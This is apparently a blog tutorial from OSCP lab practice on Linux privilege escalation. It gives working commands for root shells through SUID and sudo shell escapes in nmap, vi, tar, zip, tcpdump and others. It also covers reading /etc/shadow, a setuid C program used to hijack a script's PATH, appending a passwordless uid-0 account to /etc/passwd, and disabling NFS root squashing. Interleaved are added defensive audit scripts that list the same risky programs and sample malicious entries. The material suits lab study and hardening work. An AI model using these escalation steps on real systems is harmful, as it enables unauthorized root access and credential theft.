Privilege Escalation on Linux Platform

In this article I will note down and organize some of the privilege escalation techniques I used in the OSCP lab. Some are straightforward, but a few are tricky: you have to refresh your brain and think around the corner. Before reading it, I highly recommend checking g0tmi1k's blog for the basics of Linux privilege escalation: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

1. Kernel Exploit

For a kernel exploit, you first have to identify the kernel version and the distribution in use. Run the following commands, then search Exploit-DB for related exploits, wget the one you need, fix it, compile it and execute it. Here are the commands to identify the kernel version and the distribution:

$ uname -a
$ cat /etc/issue
$ cat /etc/*-release
$ cat /etc/lsb-release
$ cat /etc/redhat-release
$ lsb_release -a
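As an added example (not part of the original article), here is the defender-side companion to the identification commands above: it gathers the kernel release and distribution name in one place and compares the running kernel against a baseline version, so a host can be checked against the release in which a vendor fix landed. It assumes /etc/os-release exists on modern distributions and falls back to /etc/issue on older ones, as the commands above do.

```sh
#!/bin/sh
# Added example, not from the original article: kernel/distro summary plus a
# version comparison against a baseline. Assumes /etc/os-release (modern
# distributions); falls back to /etc/issue like the commands in the article.

# distro_name: the human-readable distribution name, or "unknown".
distro_name() {
  name=
  if [ -r /etc/os-release ]; then
    # PRETTY_NAME="Ubuntu 20.04.6 LTS" -> Ubuntu 20.04.6 LTS
    name=$(sed -n 's/^PRETTY_NAME="\{0,1\}\([^"]*\)"\{0,1\}$/\1/p' /etc/os-release)
  fi
  if [ -z "$name" ] && [ -r /etc/issue ]; then
    name=$(head -n 1 /etc/issue)
  fi
  printf '%s\n' "${name:-unknown}"
}

# numeric_prefix VERSION: keep only the leading dotted digits of a release
# string, so "4.4.0-210-generic" becomes "4.4.0".
numeric_prefix() {
  printf '%s' "$1" | sed 's/[^0-9.].*//'
}

# version_lt A B: exit 0 when kernel version A is older than version B.
# Components are compared numerically, left to right; missing ones count as 0.
version_lt() {
  a=$(numeric_prefix "$1"); b=$(numeric_prefix "$2")
  while [ -n "$a" ] || [ -n "$b" ]; do
    x=${a%%.*}; y=${b%%.*}
    [ -z "$x" ] && x=0
    [ -z "$y" ] && y=0
    [ "$x" -lt "$y" ] && return 0
    [ "$x" -gt "$y" ] && return 1
    case $a in *.*) a=${a#*.} ;; *) a= ;; esac
    case $b in *.*) b=${b#*.} ;; *) b= ;; esac
  done
  return 1
}

# kernel_status BASELINE: print distro and kernel, then OLDER when the running
# kernel predates BASELINE (i.e. the host still needs the patch), else OK.
kernel_status() {
  running=$(uname -r)
  printf 'distro: %s\nkernel: %s\n' "$(distro_name)" "$running"
  if version_lt "$running" "$1"; then echo OLDER; else echo OK; fi
}
```

Run `kernel_status 4.4.1` (or whatever release your distribution shipped the fix in) to get the same facts the commands above give, plus a single OLDER/OK verdict that can feed a patch-compliance check.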

In most cases you can use the sendpage or the dirtycow kernel exploit for privilege escalation. Two further kernel exploits are worth mentioning here.

The first one is the udev kernel exploit. You can refer to the following article by Mad Irish.

The second one concerns the ReiserFS xattr vulnerability. If you see any folder mounted as a reiserfs file system with the xattr attribute set, it is worth a try. Here is the reference link:

2. Exploit a service running as root

The two cases I encountered in the OSCP lab were Samba 2.2.x and MySQL.

For Samba 2.2.x, please check the following link:

For MySQL, if the mysql daemon is running as root, you can use a UDF (User Defined Function) to get a root shell.

3. Find anything with SUID / SGID permission

Use the following two commands:

$ find / -user root -perm -4000 2>/dev/null
$ find / -perm -2000 2>/dev/null

If you find any of the following commands with the SUID/SGID bit set, perfect, you have almost won.

nmap

$ nmap --interactive
nmap> !sh

Another way (if nmap doesn't have interactive mode):
$ echo "os.execute('/bin/sh')" > /tmp/shell.nse
$ nmap --script=/tmp/shell.nse

vi

$ vi
:!sh

find

$ find /home -exec sh -i \;

python

$ python -c 'import pty; pty.spawn("/bin/sh")'

strace

$ strace -o /dev/null /bin/sh

tcpdump

$ echo $'id\ncat /etc/shadow' > /tmp/.shell
$ chmod +x /tmp/.shell
$ tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.shell -Z root
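As an added example (not from the original article), the following script is the defender-side audit that belongs with the two find commands above. It lists set-id files under a root, drops the ones recorded in a baseline file (one absolute path per line, captured from a clean build), and marks the remainder RISKY when the program name is one of the shell-escape candidates listed in this section (plus the versioned python names), otherwise NEW. It assumes GNU find.

```sh
#!/bin/sh
# Added example, not from the original article: SUID/SGID audit against a
# baseline. RISKY_NAMES are the programs this section of the article lists,
# plus versioned python names (an assumption, not from the article).

RISKY_NAMES="nmap vi find python python2 python3 strace tcpdump"

# setid_files ROOT: regular files under ROOT with the setuid or setgid bit.
setid_files() {
  find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort
}

# suid_audit ROOT BASELINE: print "TAG path" for each set-id file that is not
# listed in BASELINE; TAG is RISKY for a known shell-escape program, else NEW.
suid_audit() {
  root=$1; baseline=$2
  setid_files "$root" | while IFS= read -r path; do
    grep -qxF -- "$path" "$baseline" && continue   # known-good from the baseline
    name=$(basename "$path")
    tag=NEW
    for r in $RISKY_NAMES; do
      if [ "$name" = "$r" ]; then tag=RISKY; fi
    done
    printf '%s %s\n' "$tag" "$path"
  done
}

# suid_audit_count ROOT BASELINE: number of findings, handy as an alert threshold.
suid_audit_count() {
  suid_audit "$1" "$2" | wc -l | tr -d ' '
}
```

Generate the baseline once with `setid_files / > /var/lib/setid-baseline` on a freshly built host; afterwards any non-empty output from `suid_audit / /var/lib/setid-baseline` means a set-id file appeared that the build did not contain, which is exactly the condition the attacker-side search above is looking for.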

If you find a script file with SUID permission that is owned by root, executable by others and runs other commands, you can use the following trick to get a root shell. In this example the script runs scp to transfer a backup file somewhere. Add . to $PATH, compile setuid.c, rename the compiled binary to scp, put it in the current folder and then run the script.

$ export PATH=.:$PATH
$ cat setuid.c
#include <stdio.h>
#include <unistd.h>
int main(void)
{
    /* set real and effective uid/gid to root, then replace this process with a shell */
    setuid(0); setgid(0); seteuid(0); setegid(0);
    char *argv[] = { "/bin/sh", NULL };
    execvp("/bin/sh", argv);
    return 0;
}
$ gcc setuid.c -o setuid
$ mv setuid scp
$ ./script.sh

4. Abuse sudo

Use the following command to show which commands the current user is allowed to run with sudo:

$ sudo -l

If you find one of the following commands listed with NOPASSWD and root in the output, you win again !!!

zip

$ sudo zip /tmp/test.zip /tmp/test -T --unzip-command="sh -c /bin/bash"

tar

$ sudo tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/bash

strace

$ sudo strace -o/dev/null /bin/bash

tcpdump

$ echo $'id\ncat /etc/shadow' > /tmp/.shell
$ chmod +x /tmp/.shell
$ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.shell -Z root

nmap

$ echo "os.execute('/bin/sh')" > /tmp/shell.nse
$ sudo nmap --script=/tmp/shell.nse

Another way (if nmap has interactive mode):
$ sudo nmap --interactive
nmap> !sh

scp

$ sudo scp -S /path/to/your/script x y

expect

$ sudo expect
spawn sh
sh

nano

$ sudo nano -s /bin/bash

git

$ sudo git help status
: !/bin/bash

gdb/ftp

$ sudo ftp
: !/bin/sh
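As an added example (not from the original article), the script below is the review-side counterpart of `sudo -l`: it scans a sudoers-style rule file and reports every NOPASSWD rule that grants ALL or one of the programs listed in this section. The sample rules are constructed here for illustration and the parser only understands the common `user HOST=(runas) NOPASSWD: cmd, cmd` form, not aliases or include directives.

```sh
#!/bin/sh
# Added example, not from the original article: flag NOPASSWD sudo rules for
# programs with a known shell escape. SUDO_ESCAPE_NAMES comes from the programs
# this section lists; the sample sudoers content is constructed, not real.

SUDO_ESCAPE_NAMES="zip tar strace tcpdump nmap scp expect nano git gdb ftp"

SAMPLE_SUDOERS='# constructed sample sudoers
Defaults env_reset
alice ALL=(ALL) ALL
bob ALL=(root) NOPASSWD: /usr/bin/zip, /bin/tar
carol ALL=(root) NOPASSWD: /usr/bin/apt-get update
dave ALL=(ALL) NOPASSWD: ALL
'

# trim STRING: strip leading and trailing whitespace.
trim() {
  printf '%s' "$1" | sed 's/^[[:space:]]*//; s/[[:space:]]*$//'
}

# sudoers_nopasswd_risks FILE: print "user command" for every NOPASSWD command
# that is ALL or whose program name is in SUDO_ESCAPE_NAMES.
sudoers_nopasswd_risks() {
  grep -v '^[[:space:]]*#' "$1" | grep 'NOPASSWD:' | while IFS= read -r line; do
    user=$(printf '%s' "$line" | awk '{ print $1 }')
    cmds=${line#*NOPASSWD:}
    printf '%s\n' "$cmds" | tr ',' '\n' | while IFS= read -r cmd; do
      cmd=$(trim "$cmd")
      [ -z "$cmd" ] && continue
      if [ "$cmd" = ALL ]; then
        printf '%s ALL\n' "$user"
        continue
      fi
      prog=$(basename "${cmd%% *}")   # drop arguments, keep the program name
      for n in $SUDO_ESCAPE_NAMES; do
        if [ "$prog" = "$n" ]; then printf '%s %s\n' "$user" "$cmd"; fi
      done
    done
  done
}

# sudoers_risk_count FILE: number of flagged rules.
sudoers_risk_count() {
  sudoers_nopasswd_risks "$1" | wc -l | tr -d ' '
}

# write_sample_sudoers FILE: write the constructed sample to FILE for a dry run.
write_sample_sudoers() {
  printf '%s' "$SAMPLE_SUDOERS" > "$1"
}
```

On the sample, bob's zip and tar rules and dave's blanket ALL are reported while carol's apt-get rule is not; pointed at a real sudoers file (read as root), the same output is a short list of rules to tighten.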

5. Find any writable file owned by root

Use the following command to find writable files owned by root. You may find a script file to which you can add the command you need for your privilege escalation.

$ find / -perm -002 -user root -type f -not -path "/proc/*" 2>/dev/null

6. Check whether /etc/passwd is writable

If /etc/passwd is writable, the only thing you need to do is append one line to /etc/passwd:

$ echo "testuser::0:0:pawned:/root:/bin/bash" >> /etc/passwd
$ su testuser
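As an added example (not from the original article), here is the detection side of the last two sections: it audits a passwd-format file for extra uid-0 accounts and for empty password fields (the shape of the line appended above), and reports whether the file itself is world-writable. The sample content is constructed, not a real /etc/passwd; the permission test assumes GNU find.

```sh
#!/bin/sh
# Added example, not from the original article: audit a passwd-format file for
# the conditions the two sections above exploit. SAMPLE_PASSWD is constructed.

SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
testuser::0:0:pawned:/root:/bin/bash
'

# extra_uid0 FILE: account names with uid 0 other than root.
extra_uid0() {
  awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# empty_password_entries FILE: accounts with an empty password field, i.e. no
# "x" pointing at /etc/shadow and no hash, which may allow password-less login.
empty_password_entries() {
  awk -F: '$2 == "" { print $1 }' "$1"
}

# world_writable FILE: exit 0 when "others" have write permission on FILE.
world_writable() {
  [ -n "$(find "$1" -maxdepth 0 -type f -perm -002 2>/dev/null)" ]
}

# passwd_audit FILE: one finding per line; empty output means nothing to report.
passwd_audit() {
  extra_uid0 "$1" | sed 's/^/EXTRA_UID0 /'
  empty_password_entries "$1" | sed 's/^/EMPTY_PASSWORD /'
  if world_writable "$1"; then echo "WORLD_WRITABLE $1"; fi
}

# write_sample_passwd FILE: write the constructed sample to FILE for a dry run.
write_sample_passwd() {
  printf '%s' "$SAMPLE_PASSWD" > "$1"
}
```

`passwd_audit /etc/passwd` on a healthy host prints nothing; on the sample it reports testuser twice (duplicate uid 0 and empty password), which is the footprint the echo line above leaves behind.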

7. NFS root squashing

According to Wikipedia, root squash is a special mapping of the remote superuser (root) identity when using identity authentication (the local user is the same as the remote user). Under root squash, a client's uid 0 (root) is mapped to 65534 (nobody). It is primarily a feature of NFS but may be available on other systems as well.

In the scenario where showmount shows that your target has an NFS service up and running, you are already in by some means, and you find that you also have permission to edit /etc/exports (for example through sudoedit), you can add no_root_squash to disable root squashing. Please see below:

/home/userfolder *(rw,no_root_squash)

Then mount this folder as local root and put a copy of /bin/bash into it. After that, use the compromised normal account to execute this /bin/bash. You will be in heaven !!!
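As an added example (not from the original article), the script below is the audit for the export setting just described: it parses an /etc/exports-style file and prints every client entry whose options contain no_root_squash, tagging entries open to any host (`*`) separately. The sample entries are constructed for illustration.

```sh
#!/bin/sh
# Added example, not from the original article: find exports that disable root
# squashing. SAMPLE_EXPORTS is constructed; the first line mirrors the article.

SAMPLE_EXPORTS='# constructed sample exports file
/home/userfolder *(rw,no_root_squash)
/srv/share 10.0.0.0/24(ro,root_squash)
/export/data 10.0.0.5(rw,sync,no_root_squash) 10.0.0.6(ro)
'

# exports_no_root_squash FILE: print "TAG path client" for each client entry
# whose option list contains no_root_squash; TAG is ANYHOST for "*", else HOST.
# Runs in a subshell with globbing off so a "*" client is never expanded.
exports_no_root_squash() (
  set -f
  sed 's/#.*//' "$1" | while read -r path clients; do
    [ -z "$path" ] && continue
    for spec in $clients; do
      client=${spec%%\(*}                 # host part before "("
      opts=${spec#*\(}; opts=${opts%\)}   # text inside the parentheses
      [ "$opts" = "$spec" ] && opts=      # no parentheses: no options given
      case ",$opts," in
        *,no_root_squash,*)
          if [ "$client" = '*' ]; then tag=ANYHOST; else tag=HOST; fi
          printf '%s %s %s\n' "$tag" "$path" "$client"
          ;;
      esac
    done
  done
)

# exports_no_root_squash_count FILE: number of flagged client entries.
exports_no_root_squash_count() {
  exports_no_root_squash "$1" | wc -l | tr -d ' '
}

# write_sample_exports FILE: write the constructed sample to FILE for a dry run.
write_sample_exports() {
  printf '%s' "$SAMPLE_EXPORTS" > "$1"
}
```

On the sample, the /home/userfolder export is reported as ANYHOST and /export/data as HOST for 10.0.0.5, while /srv/share (root_squash kept) is silent; `exports_no_root_squash /etc/exports` on a real server gives the list of shares on which a client's root would keep uid 0.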

8. Useful tools

In the final section, I will introduce three useful tools for your PE. These tools check and enumerate your target and show rich information for your PE on the Linux platform.

I hope you enjoy the article and wish you a wonderful experience with your Linux privilege escalation. If this article helps you in any way, please don't hesitate to give me your clap.

Jie Liau